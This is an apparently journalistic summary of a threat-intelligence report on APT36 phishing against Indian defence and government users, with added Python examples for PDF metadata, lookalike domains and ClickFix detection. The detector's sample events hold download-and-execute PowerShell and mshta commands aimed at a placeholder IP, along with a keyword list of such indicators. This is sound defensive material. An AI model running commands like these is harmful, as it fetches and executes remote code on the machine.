Pakistan’s Cyber Offensive: APT36 Targets Indian Defence

A recent report by Cyfirma details a sophisticated phishing campaign orchestrated by the Pakistan-based Advanced Persistent Threat group APT36, also known as Transparent Tribe. Active since at least 2013, APT36 has honed its focus on Indian entities, particularly the defence sector, government agencies, and educational institutions.

The campaign, uncovered in June 2025, leverages social engineering and malicious payloads to infiltrate sensitive systems, exploiting India’s National Informatics Centre (NIC) credentials to gather intelligence.

This summary dissects the report’s findings, highlighting the tactics, implications, and broader geopolitical context.

A Deceptive Lure

APT36’s latest operation employs spear-phishing emails masquerading as official NIC correspondence. These emails are typically themed around urgent policy updates or geopolitical events, such as the April 2025 Pahalgam terror attack in Kashmir in which Indian tourists were murdered, to entice recipients to open malicious attachments or click embedded links. The campaign uses decoy documents, such as a PDF titled “Action Points & Response by Govt Regarding Pahalgam Terror Attack.pdf,” which direct users to fake login portals mimicking Indian government domains like jkpolice.gov.in.

These portals harvest credentials from officials using @gov.in or @nic.in addresses, enabling further network infiltration.

The group’s malware arsenal includes Crimson RAT, a remote access trojan used for data exfiltration, and macro-enabled PowerPoint add-in files (PPAM) that deploy payloads when opened. Analysis of a malicious PDF’s metadata reveals it was created on 23 October 2024 in Pakistan’s time zone, using a laptop from the Prime Minister’s Youth Laptop Scheme - a telling clue to the campaign’s origins.
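The metadata check described above is straightforward to reproduce. The following is an added example (not Cyfirma’s tooling, and the embedded PDF and its timestamps are constructed for illustration): it pulls the Info dictionary of a PDF and parses the PDF date syntax, including the UTC offset, which is the detail that separates a document built on a machine set to Pakistan Standard Time (UTC+05:00) from one built on Indian Standard Time (UTC+05:30).

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed minimal PDF carrying an Info dictionary. The title, creator and
# timestamps are illustrative and are NOT taken from the real lure document.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n"
    b"<< /Title (Action Points & Response) /Creator (Microsoft Word)\n"
    b"   /Producer (Microsoft Word) /CreationDate (D:20241023154512+05'00')\n"
    b"   /ModDate (D:20241023160001+05'00') >>\n"
    b"endobj\n"
    b"trailer\n<< /Info 1 0 R >>\n%%EOF\n"
)

# PDF date syntax (ISO 32000-1, 7.9.4): D:YYYYMMDDHHmmSSOHH'mm' where O is +, - or Z.
# Everything after the year is optional, so each field gets its own optional group.
PDF_DATE_RE = re.compile(
    r"D:(\d{4})(\d{2})?(\d{2})?(\d{2})?(\d{2})?(\d{2})?"
    r"(?:(Z)|([+-])(\d{2})'?(\d{2})?'?)?$"
)


def parse_pdf_date(value: str) -> datetime:
    """Turn a /CreationDate or /ModDate string into an aware datetime (naive if no offset)."""
    m = PDF_DATE_RE.match(value.strip())
    if not m:
        raise ValueError(f"not a PDF date: {value!r}")
    defaults = (None, 1, 1, 0, 0, 0)
    year, month, day, hour, minute, second = (
        int(g) if g else d for g, d in zip(m.groups()[:6], defaults)
    )
    if m.group(7) == "Z":
        tz = timezone.utc
    elif m.group(8):
        sign = 1 if m.group(8) == "+" else -1
        tz = timezone(sign * timedelta(hours=int(m.group(9)), minutes=int(m.group(10) or 0)))
    else:
        tz = None  # no offset recorded: the spec treats the zone as unknown, so do not guess
    return datetime(year, month, day, hour, minute, second, tzinfo=tz)


def info_dictionary(pdf: bytes) -> dict:
    """Collect literal-string entries such as /CreationDate and /Creator.
    Deliberately simple: a production parser must follow the trailer's /Info
    reference, handle hex strings, escapes and object streams, and also read the
    XMP metadata stream, which attackers sometimes leave inconsistent with Info."""
    text = pdf.decode("latin-1")
    return dict(re.findall(r"/(\w+)\s*\(((?:\\.|[^\\)])*)\)", text))


def provenance(pdf: bytes) -> dict:
    """Summarise what an analyst reasons about: authoring software, local creation
    time, the UTC offset the authoring machine was set to, and the UTC equivalent."""
    info = info_dictionary(pdf)
    created = parse_pdf_date(info["CreationDate"]) if "CreationDate" in info else None
    offset = created.utcoffset() if created else None
    return {
        "creator": info.get("Creator"),
        "producer": info.get("Producer"),
        "created_local": created.isoformat() if created else None,
        "utc_offset_hours": offset.total_seconds() / 3600 if offset is not None else None,
        "created_utc": created.astimezone(timezone.utc).isoformat() if offset is not None else None,
    }


if __name__ == "__main__":
    print(provenance(SAMPLE_PDF))
```

The offset is evidence, not proof: it reflects the clock settings of the authoring machine and is trivially editable after the fact, which is why the report pairs it with the laptop-scheme artefact and infrastructure overlaps rather than relying on it alone.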

The use of fake domains such as email.gov.in.gov-in.mywire.org, hosted on IPs previously linked to Pakistani APT activity, further supports attribution to APT36 with moderate confidence.
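The lookalike domain above works because readers scan the left-hand labels (email.gov.in) and stop before the part that actually matters, the registrable domain (mywire.org). The check below is an added example, not code from Cyfirma or the report: it judges a URL, hostname or sender address by whether it sits *under* a trusted suffix, and otherwise looks for trusted-looking label runs smuggled into the name. The trusted-suffix and impersonated-label lists are assumptions for illustration and would be built from an organisation’s own domain inventory.

```python
from urllib.parse import urlsplit

# ASSUMPTION: illustrative lists; extend from your own inventory of legitimate domains
# and the brands/agencies your users are likely to be lured with.
TRUSTED_SUFFIXES = ("gov.in", "nic.in")
IMPERSONATED_LABELS = (("gov", "in"), ("nic", "in"), ("jkpolice",))


def hostname_of(target: str) -> str:
    """Lower-cased hostname of a URL or bare host, without port, userinfo or trailing dot."""
    if "://" not in target:
        target = "http://" + target
    return (urlsplit(target).hostname or "").rstrip(".").lower()


def is_trusted_host(host: str) -> bool:
    """Genuine only when the trusted suffix is the *end* of the name.
    'email.gov.in.gov-in.mywire.org' fails: its registrable domain is mywire.org."""
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def embeds_labels(host: str) -> list:
    """Trusted-looking label runs that appear anywhere else in the name.
    Hyphens are treated as label separators so that 'gov-in' counts as 'gov.in'."""
    labels = host.replace("-", ".").split(".")
    found = []
    for needle in IMPERSONATED_LABELS:
        n = len(needle)
        if any(tuple(labels[i:i + n]) == needle for i in range(len(labels) - n + 1)):
            found.append(".".join(needle))
    return found


def classify(target: str) -> str:
    """Classify a URL, hostname or e-mail address as trusted, lookalike, untrusted or invalid."""
    if "@" in target and "://" not in target:   # e-mail address: judge its domain part
        target = target.rsplit("@", 1)[1]
    host = hostname_of(target)
    if not host:
        return "invalid"
    if is_trusted_host(host):
        return "trusted"
    return "lookalike" if embeds_labels(host) else "untrusted"


if __name__ == "__main__":
    for t in ("https://email.gov.in.gov-in.mywire.org/login",
              "https://jkpolice.gov.in/", "officer@nic.in", "https://mygov.in/"):
        print(f"{classify(t):10} {t}")
```

Matching on whole labels rather than substrings matters: a substring rule for "gov.in" would flag the genuine portal mygov.in, and analysts quickly stop trusting a detector that cries wolf on real government sites. A URL of the form https://jkpolice.gov.in@mywire.org resolves to mywire.org after userinfo stripping and is reported as untrusted, which is still the correct verdict.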

Evolving Tactics

APT36’s methods reflect a blend of persistence and innovation. The group exploits human vulnerabilities through carefully crafted social engineering rather than zero-day software flaws, maximising psychological impact by leveraging sensitive topics like Kashmir. Its use of cross-platform languages like Python, Golang, and Rust, alongside command-and-control channels on platforms like Telegram and Google Drive, demonstrates technical sophistication. The campaign also employs “ClickFix” tactics, instructing users to paste and execute malicious PowerShell commands via the Windows Run dialog; because the victim launches the command themselves, no exploit or macro is needed, and the technique has become increasingly popular amongst cybercriminals for its ability to slip past controls that focus on malicious attachments.
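ClickFix leaves a recognisable process ancestry: the Run dialog is part of explorer.exe, so the pasted command appears as a script interpreter spawned directly by explorer.exe, usually with window-hiding and execution-policy flags and often an -EncodedCommand blob. The detector below is an added example, not part of the report or any vendor product; it runs over constructed Sysmon-style process-creation records (the IP 198.51.100.7 is a documentation address used as a placeholder) and decodes the base64 UTF-16LE payload so the indicator match also covers what the encoded script actually does.

```python
import base64
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Flags and cmdlets a pasted ClickFix one-liner almost always needs. Word boundaries
# only where the token is alphanumeric; '-nop' and friends follow whitespace.
SUSPICIOUS = re.compile(
    r"(?i)(\biex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
    r"|\bmshta\b|bitsadmin|-w(?:indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|https?://)"
)
# -EncodedCommand and its abbreviations take base64 of the script text in UTF-16LE.
ENC_RE = re.compile(r"(?i)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")


def _encoded(ps: str) -> str:
    return base64.b64encode(ps.encode("utf-16le")).decode()


# Constructed Sysmon Event ID 1-style records; not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -enc "
                    + _encoded("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c mshta http://198.51.100.7/x.hta"},
    {"ParentImage": r"C:\Users\analyst\AppData\Local\Microsoft\WindowsApps\wt.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event: dict):
    """Flag an interpreter spawned by explorer.exe (Run dialog / double-click) whose
    command line, or decoded payload, carries download-and-execute indicators."""
    parent, image = basename(event.get("ParentImage", "")), basename(event.get("Image", ""))
    if parent != "explorer.exe" or image not in INTERPRETERS:
        return None
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    haystack = cmd + ("\n" + decoded if decoded else "")
    indicators = sorted({h.lower() for h in SUSPICIOUS.findall(haystack)})
    if not indicators and decoded is None:
        return None  # a bare interactive shell from Explorer is normal admin behaviour
    return {"image": image, "decoded": decoded, "indicators": indicators}


def scan(events):
    return [a for a in map(assess, events) if a]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Ancestry is the strong signal here; keyword lists drift as operators rename cmdlets and split strings, so keep the parent/child rule and treat the indicator list as tunable. For after-the-fact triage, the Run dialog also records what was typed under the user's RunMRU registry key, which corroborates the process-creation telemetry.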

The report notes APT36’s focus on India’s defence and aerospace sectors, with previous campaigns targeting state-run contractors and military personnel. By impersonating legitimate entities and exploiting topical events, the group ensures high success rates in credential theft and malware deployment.

This campaign’s rapid response to the Pahalgam attack underscores APT36’s agility in capitalising on real-world incidents.

Geopolitical Undercurrents

The campaign is not merely a technical exploit but a facet of Pakistan’s broader cyber-espionage strategy against India. Amid strained bilateral relations, exacerbated by Kashmir tensions, APT36’s activities align with Islamabad’s interest in gathering strategic intelligence. The use of government-issued laptops suggests possible state sponsorship, though Cyfirma stops short of definitive attribution. India, meanwhile, faces mounting pressure to bolster its cybersecurity infrastructure, as repeated breaches expose vulnerabilities in its defence ecosystem.

The IMF’s October 2024 report, forecasting sluggish global growth, indirectly highlights the economic stakes: India’s defence modernisation, critical to countering such threats, competes with fiscal constraints. The NIC, a backbone of India’s e-governance, is a prime target, as compromised credentials could unlock access to sensitive national systems.

Countering the Threat

Cyfirma recommends robust defences: advanced email filtering to detect phishing, disabling macros by default, and regular simulation drills to train personnel. Integrating geopolitical threat intelligence into security operations could preempt such campaigns. India’s government must also address systemic gaps, such as outdated software and lax credential management, to deter future attacks.

A Persistent Menace

APT36’s campaign underscores the growing nexus of cyberwarfare and geopolitics. As Pakistan-based actors refine their tactics, India’s defence sector remains a vulnerable target.

Without decisive action - technical, organisational, and diplomatic - these digital incursions risk eroding national security. The stakes are high in this shadow war, where clicks can be as damaging as missiles.

Cyfirma  |    Cyfirma   |    IMF 

